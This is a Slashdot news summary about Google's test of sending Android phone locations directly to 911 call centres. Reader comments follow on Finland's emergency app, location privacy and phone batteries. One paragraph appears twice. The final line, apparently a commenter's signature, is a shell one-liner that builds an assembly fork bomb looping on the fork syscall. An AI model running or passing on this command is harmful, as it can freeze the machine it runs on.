Google is Making it Easier For 911 To Find You in an Emergency (engadget.com)
An anonymous reader shares a report: When you call 911 from a cellphone, your location is typically sent to the call taker by a wireless carrier. But that information isn't always so accurate. Well Google might have a better way of going about it and it tested its system across a few states in December and January, the Wall Street Journal reports. In the states where the tests took place, Google sent location data from a random selection of 911 callers using Android phones straight to the people taking those calls. The test included 50 call centers that cover around 2.4 million people in Texas, Tennessee and Florida, and early reports of the results suggest the system is promising.
One company involved in the test told the Wall Street Journal that for over 80 percent of the 911 calls where Googl's system was used, the tech giant's location data were more accurate than what wireless carriers provided. The company, RapidSOS, also said that while carrier data location estimates had, on average, a radius of around 522 feet, Google's data gave estimates with radii around 121 feet. Google's data also arrived more quickly than carrier data typically did.
One company involved in the test told the Wall Street Journal that for over 80 percent of the 911 calls where Googl's system was used, the tech giant's location data were more accurate than what wireless carriers provided. The company, RapidSOS, also said that while carrier data location estimates had, on average, a radius of around 522 feet, Google's data gave estimates with radii around 121 feet. Google's data also arrived more quickly than carrier data typically did.
But how do I make Google forget where I was?
Time is what keeps everything from happening all at once.
Finland commissioned an app for exactly this. For example I have the app on my Android phone. It detects automatically if I am about to call 911 (112 in Europe actually, but if you dial 911 it will work as well), uses the facilities of the cell phone to locate me, and sends the location via a side channel. It is probably much more accurate than the information cell phone towers has.
IIRC over million people (out of ~6 million living in Finland) have downloaded the app.
They also built an API for the national "911 system" so that systems integrators can develop competing applications. There is one such application already, made by a consortium of reindeer farmers or something similar. I have not looked into it, but iirc their application has extra features related to their jobs.
CAUGHT! Time travelling fool, nobody in this realm removes their batteries anymore! GET HIM!
It is surprising that slashdot makes no reference to the Advanced Mobile Location system, given that it already wrote about it in an article. Because we would like to compare the pros and cons of those different systems.
So non removable batteries were a cunning NSA ruse?
Inconceivable! I was told non removable batteries were because users wanted phones that were so thin and so waterproof so they could use them in a pinch to shave in the shower and didn't care about battery life or longevity because they wanted to commit to spending $1000 on a new one in a year and half's time even though it didn't have a headphone port, or, the way things are going a speaker, microphone and display.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;